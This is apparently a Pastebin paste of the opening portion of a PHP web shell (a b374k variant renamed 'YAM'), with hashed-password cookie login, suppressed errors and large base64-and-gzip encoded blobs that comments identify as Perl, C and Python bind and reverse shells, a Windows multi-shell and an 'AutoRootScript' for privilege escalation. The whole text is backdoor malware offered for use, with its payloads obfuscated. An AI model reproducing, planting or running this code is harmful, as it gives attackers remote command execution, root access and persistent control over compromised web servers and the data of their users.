Yamraaj

b374k2012full

Dec 3rd, 2012
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 269.02 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. error_reporting(0);
  5. @set_time_limit(0);
  6.  
  7. //$postpage = "abc";
  8. //$prepage = "acb";
  9. $s_name = "YAM"; // shell name
  10. $s_ver = "IHOS"; // shell ver
  11. $s_title = $s_name." ".$s_ver; // shell title
  12. $s_pass = "806ad1e1a4aa6498a4b7adaed7639293"; // password (yam)
  13.  
  14. $s_auth = false; // login status
  15. if(strlen(trim($s_pass))>0){
  16. if(isset($_COOKIE['YAM'])){
  17. if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['YAM']))) $s_auth = true;
  18. }
  19. if(isset($_REQUEST['login'])){
  20. $login = strtolower(trim($_REQUEST['login']));
  21. if(strtolower(trim($s_pass)) == md5($login)){
  22. setcookie("YAM",md5($login),time() + 3600*24*7);
  23. $m = $_SERVER['PHP_SELF'];
  24. header("Location: ".$m);
  25. die();
  26. }
  27. else{
  28. setcookie("YAM",$login,time() - 3600*24*7);
  29. $m = $_SERVER['PHP_SELF'];
  30. header("Location: ".$m);
  31. die();
  32. }
  33. }
  34. }
  35. else $s_auth = true; // $s_pass variable (password) is empty , go ahead, no login page
  36.  
  37. if (!empty($unset_surl)) {setcookie("GNY_surl"); $surl = "";}
  38. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("GNY_surl",$surl);}
  39. else {$surl = $_REQUEST["GNY_surl"]; //Set this cookie for manual SURL
  40. }
  41. // resources $xback_pl $xbind_pl $xback_c $xbind_c $xmulti_py $wmulti_c... this was used with bind and reverse shell
  42. // use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
  43. $xback_pl
  44. ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO
  45. 94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx
  46. 6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
  47. $AutoRootScript = "rZlJb9pAGIbvSPyHKe0hOfgz3iFRLl3UnnrpsaoUYw9gxXiQl8Zp1f9eb5jZTMRMTgnf+83zzr7A+3fmJsnMTVjs57P5rMrCA0ZGeD+fHZ7iJEcFjtzmQxSf/sPRnqDFpz2OnpJsh5ItCtMch/ELygkpAWDRprdy+/m+hT7vcIn2ZXm8M804hTgnxw2pISIHszK9tePbjuuaGX42LcPuSh9IjJZBEKA+AKOginV4rDNgHS2sy2PdAetqYLku6DtAp/m2YXHILgCjoIr1Dcc2XN+wl5bgwGkgS9fwDSR+wdkn0OGDD9aqodQradMkMkwU0qqA5bstaSm1p0SQFtCzXrty17XLGK615vkIAetCQ2kZJgqpVSCMkpj1HCJwlrSbZl9umk017UFeTKsKduBOz2FKBGkBLWsnaMbIBgtw6rVIfl+bzoLLCPVa2auJzjgLICSq23XbXVP7j9+Kw1E05WWYKKRRAUfi6pytdE6/HjDRn2cBhEQNu35qfqmPKUlKma2QAJMF36oakmktJsiqoTuZhTPwFANa1uEbeSRr3SkOfJqq1yvjKh/VtxtTbpH060NnaXCHZ39m6hyVHgv0OqCnAfRZoN8BfQF4DZKbjf1EFOfgVUj+ORAMz4FA8hy4Clxz3LrH1hpdumKRq4640gCuWeC6A6513ivcNWS4d2hdM/jNf9jztbZ6y+GGpw/AKChi+dfa8FjTWZiWB8Weww4hoERFOLdKrX6ZWuI6vYbJPwaHCJwlRTK3AKx+BVg6S6C5Ano81fAGrqGzATpcLzh9Hzha54jfnIQ89xQDWlY8VvhzZThY9Caw5fHbwhACSlSF20sB3oeAEtXguD5yfT1E4Cwpk22BbJ/IOledprgjkJ0TWefKgftrkAAfgsAkqFlsqzQ1MpwWJGNtWAGERDW7XfiSk4J1GmNAy2r8FGdJIezeVBTYFEUXEoWp0RY0hhEwZA27lAavQNQqdnzOnnDejBJbEToMXJKaUVuEW6inEFCiOhyOLyK+DwKToGhRZdx1ZIjAWVIjl8lvkiYse4wBLavxq02VlRXLH2NAy2r834fimCYRNsT5yZpeToRXQWrV+2PFkm8nqCiwKbTL+Onm9u98lmzRT7T4cJPEyKhuF+gBLZYL9OselXuczdsfRwCaYvkBGfmW/aHkKykR6mZk8+fuc/vjCK67ZjX7Iz5lfSdoR0gM6EeZpClaPD7vSXhIHkdMW27bzoV/89l/";
  48. $xbind_pl
  49. ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3
  50. AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1N
  51. WzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5
  52. Wikvo+hjUoV7Dvky3ZfgI=";
  53. $xback_c =
  54. "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6
  55. YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJW
  56. UnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
  57. $xbind_c =
  58. "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEO
  59. c7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V
  60. 5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7
  61. wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
  62. $xmulti_py =
  63. "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yE
  64. zJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUX
  65. FyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPT
  66. jM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpX
  67. K2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
  68. $wmulti_c =
  69. "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf5
  70. 7kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1
  71. HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKp
  72. BY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MB
  73. q3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei1
  74. 9o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoI
  75. jkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBT
  76. witSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd
  77. 8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up
  78. 9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51n
  79. zYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRY
  80. HN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64
  81. dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1z
  82. Zapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg2
  83. 8f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKX
  84. No4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppw
  85. keXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5E
  86. GrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngX
  87. EYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0
  88. gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+c
  89. NDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw7
  90. 8OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKl
  91. PE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8yk
  92. pox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup
  93. 86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq
  94. 8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivew
  95. lfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d
  96. 1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA
  97. 0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyK
  98. IKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxG
  99. y8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS
  100. +Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJ
  101. gZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb
  102. 9D4hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuy
  103. tBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN
  104. 8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4
  105. /2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf";
  106. $favicon =
  107. "";
  108. $style =
  109. "tVbbjpswEP0VS6tKrRQiLmmaJU+rSv2Cqq+VwSZYa2xknE2yaP+92BiYgJNupW38kpCZ8cw5Z2bIJLm0KMP580HJoyDpQ2g/e1RIoYOGvdI0iuqz+13givFL+hOXssKrX1QRLPDqSTHM9yiXXKr0oSiKPXpDDxVmwh+6xoQwcUjj+ox2JnZQydcgk4pQFShM2LFJURSaf7wPT4zoMo3C8JO9qKS4s2lRhdWBiRRc0H3V9KwDzNlBpJwWGjggTW74TCZl1AIgYns7MJy8gxPNnpkOtMKiKaSqUqSkxpp+DqJknXwj9PDF1XnfBN6NcAtAdbhOzzbfd8nTD1cioblUWDMpUiEFNZZrE4iJQrYDjAaBtGMTNZIzgsYIro4tLM+QE3Ynsk9dNJ3xdgb/8LxBuuOgpOxQ6jTeGKcXqjTLMXf4V4wQ3md2wBe8QusXQ9usGgv3qQ+TSU6svTX8MIw51bpDo6lx7irtBUvF0S/YgWdkQOlKQ85lbVwqhtoRtc0g6UkaMwZh/PjRnP37CPVl/WGQ+Dpw42nAzVXhaSktM7CmZGvOvdT+ntlVP6yZqI/6tZNLrWRV6+4LfcE8l4T62epTTq8HzVhJJrWWFeyC5NGc5cRbtJ5LoPVrdEoKNohriCSmFSgmO+p2cR+sJXo0Z6GMUYiAG1jKAIFJ51x3rrNsoEyvzMxYuTlHBhszMG+iOB/uYd8HnAka3JsKWtbXl5RTNyVDN0HARacUs2581MM4yqfOaGeONWxolR3FhbWIsKbm+OIKnub71MPddFC0OfKOtX/cVUuOBi4XIwNC1U9dX4lOERhjIAcLds9obTifkWCkW9ZmFSCNM35DFJGJ0WcNHYi/y1weuf1MQbaumjv9BsgaLylXlngfVd5mGxzLuIUrXhmrq07+CoZxErqdFs6aLTcHAGExmM3b7QwXc/PNEgeOgf20twfIzF5j9FSwOSGAVteo78FyiGUZg1t8c3f6jVPT3yVD1LyDlAo9RTYza1RXdcnk+T/0RjTfpxaPSez9xZYLz5vcZPke/Gwo3wuOan4PzT+Fju7vFBC3kFKbMbSUKYi2HadcL1ufAmOwlKb4pWqXOMZxvH9DfwA=";
  110. // http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable
  111. $sortable_js =
  112. "3VrvctvGEf/OpzixqkiGJCg6SWciilIsW5lo6jidWtN8oGjNAThSsECAAY6i1VgznT5GP7Zf+xTJm/RJurv3BwcQpKU07WQ6Y0vA3f753e7e7t5BdzxjubzIL87ZmA0++TIIrtNk78tPBjMe52LUyNNMSu7HAqZ
  113. /aLAoieQRm62SQEZp0u7Q2Iy1eTZfLUQicy/gcSyEF6aJ6LBMyFWWjBqsdh5EymwFSkjEtYwWIuuwIBY8u0ikyO54bEZHTBHthWlAgrwgE1yK81jgG/vwgRVTcyH1eH52f8nnr/nCxWKX5L18fnl+/Uda+dv2VXg
  114. VnnYmV4Mrrz+tvNFr55R+7g9AxizNznlw096ps90iNa1Or7AYjVizKRhBzPMcGbwclg5SB1c+gsTJK3/QYXtj1h92HOALfiveaAotEkA90I9eA2zlEhzt1r4F+Y3gYavjxSKZyxs2HrND4oNxMFe9FyzXiOg8vly
  115. KJHxxE8Wh1pWl63xyOCUCGoiSXGTyTIA9YSE3oqeGZ1GWS2KkJblw5degAvEkqzjusNIge8SKQP1oQx4BM2sFaw9tuLDBgAU8aUkWpEvB1hEQyHXKUJjIGPKhvfEVni2EQiro8wIRx7mKGta+gx0XjQ9HLDrWXFo
  116. xjHS71jl7enISTZ0AWXBZxAepuk5SfMY4AV6Em99GS7B/lAPkGEIBOADXY8W1J7z/58P+F9NuB2VqW6EQFJ/eiSyLQowBHJoMpyPjHtJzcMDk/VKksyJYJ018vG52De8UvdcyMdmiFTvoCij4ZMhA4Q6JGCRMQMJ
  117. 6sixvvhJ5fgmYVTz0Ih1xtVLAoKtFEiWheA9CotEWMumn4X0RC2dpGIlcBV4oeHLNw/D8DjdMwd1rBnEU3DadVOFsVHDm1ixRrE+Ebrb4wc10mQBT5UJJqgBV29XVgNDLKjOxjHkAu6iqsQXpZmPwWqtrWdGZWIC
  118. zVCqoyZln9xdhVfZsHYKhW52OTtkgE953JJ98Cfu0TO1FyNAsC1ZTzQphkojs68tvXmFwqHp4yloHiZ8vj2cpVJgZLH/cXAsfUM3z5snnxwMcP2mxI003OvjN+2efn302aplVuwmw0IUQbTF6eKKHjWn/9562Tq3
  119. z+H/kaWWWwtPK84/1tKKu9bSaalYIn+rp323z9Pl2TytdVU9Lp0wg15JnsJ7XaSiclsIQeQFKw8ncSQpYSmxewBcvAQrMX5hVh7oE8ASyIRmrwYjIdXh54DEOb5Gxf7YgI+BBtyj1Pn5cNtD1yLExrNjxbmHSUiS
  120. 6PkEc9QnlcWHqQNAbWkPQqWQHBJMAEMLGVuxCVWQbtvu/3BPp+ppnGccaOcGqCHXV7InaYqt48k0aSmvUZ7nt1Ttsr94dO00dvOreyuqe2CdNM0U0TmMg5AWa5VK8l23q5N7pTm4CyKbQ1OvBqQrtQhzKqOZft/9
  121. AE4CN/C3LqV9JCWqxHOmX7Fys7t0UmjO967DtiIUUBUZ7WlD/6MxgO6HqgaHHlCtspZmVWyjqxni8vOE1PW61B/JKXjEdrwQjl9sy1/q1MqiTNe4AdFOzMUkWlMZWq2igYMg0u2/7p5Of/vrjP/Z/+vu//vK3H/8
  122. 5PZ1chT1v2v3t6T710CZnV1eYwL7LokBZbZnmeQj7D31YCN84WnaUfkNN0ulwA3yQJ3IBB107qx2WiyClrb5J8MwuUgk5YcNnOxCH4WJRtMaUtJTsj/AtFmFYaqm3Od0ocP45EmeJPY+67nTCC2uX6v95fpEsVxK
  123. 3eFufIHCy9ixXPT8cHDS2E7dbEQq2R1naexQTjhZ04QvIZ3iVgJGzgqQzixJIv3ii2bPoXJtVGW39G7y9yrsf4P/+YN5jtvRZH7iKI2OUp6m1bD9LqXyyPvlYVRgrcEaGkyD51jYnJDHgQPHpkTK/nabeQaav0rX
  124. IXgBFu0P+1V6rIrnj8Up8DAop+uyozIk//vRRbh+q6u1IixgemQd8oqRm/YX5pZTuYAQTHjtW6orubfN4b4V0t6a8igxIdnptekmPiwCzGnAzX8WysAhhd5O/7vXc1E8nBsSbiLWuvlSsNzK8rcEbK9WcE/3bKbQ
  125. FEyxNYXHklun7Q5B4Qsr6fV31kNstfEaTtZOueHrcJiI3kzuL5T2fBHNu8u5Xccplm1O1MRaevD3sf+H1p2DgljquYCRH0L69bnMOtYPYD9HwflmOv1MOcwX5Pggi/kN7fADBfd/XiyjKbc0C6DIWlI3HqNJcY5E
  126. oM3VcmgHjWi1DVwPm9hoF+jqJDLOt6IGYe3ND9Ol0xBbm5Rm8hM7dkb45cm4Z4QSD1K3DVnehp8PydKinsUKFcghv990FvWlo/q8E2jMHGhHL4XgMwxtOgYljd3yrS7Au/0IuCd11L35VLvkvQvtFXQJOueG3IqP
  127. e3nFLHOUSW+bF8hrHyEWY1syWxmesH0hnwPZJKs7ka74sPoysIbmJNo6p5ltN6m8zmDFt7fFV7ZEj1u1GNhUUMAgWXjQy9dCFZhP6wENm8X2vMWFCNg92qDu0g/AIw9+PGhWsqpzIfl/bcE/BNjXIBSsR7Ali7vc
  128. fA7aPYI8fDbZfgO3vBOt3u/qZNR4a5HhzvDZ3tK9AjEjwwxRo3jrbbr789hvdCL5KeSjCZs8p7fjZrKfcBuGuNA2+E/7vIzmIoLvKoeDzu2jOZZp5q1xkz+cgyF7oJ9FsppatPodhI47Ngv5Gtvk5bhAThg9oUCy
  129. DA6XDwgeXhPdvJJ5IKteHiLTd0Z894pi+96QJioMePQljkemmgQ0PaSlrOKCna0/TjCuiRg176V6++dbXUz36XNAzsu0C9HS9F7ZNtkuyCns7Bxn1ZUURePv781UUdlj5He9YXKgeDlKcELNRLnAOOuXyO34lfdA
  130. 7WYvFsTLRBHGadGbQ5PoctJPHiHdMNGmmSZN1yY7TkgzIuYWYEpmNf0taNgHy6ZFRo1aCJSATkTzAtWk3oBs6MaDuw54UAQ5LEQQ7JrcGgRsCFafB4afO2mrLqz6ybr5qNWPWB2fFjpXaxGszmKomdCIp0hKRoNf
  131. u9FftWfReMbfVjVK6hjW+1PsYCWg0rAx09CXkd7Q5cVRt047C39mMUBKjF0e/PBMpzgknSlgpWolpf99ZYxE4uq+3HzdKZMYU47EuZs45z1jEFLnStYJDMirZ2dqpMLJaxjKj3y/VCQjlasrKjDG+l8t0+YcsXXL
  132. IxupjoeWoTBUtgVC7AAHVS0cppSytv5XULNgVUoNlU0rAk0DEZytf/ZWGiiRVY/ae06Wh/rRALKURVyDdC/aYH6fBLbYvCR761YVVzRm3fBtpznvETH/i0dYCeoqSanmkX8zFI6L8SqsHe6UyxZirw5b670Qgd4O
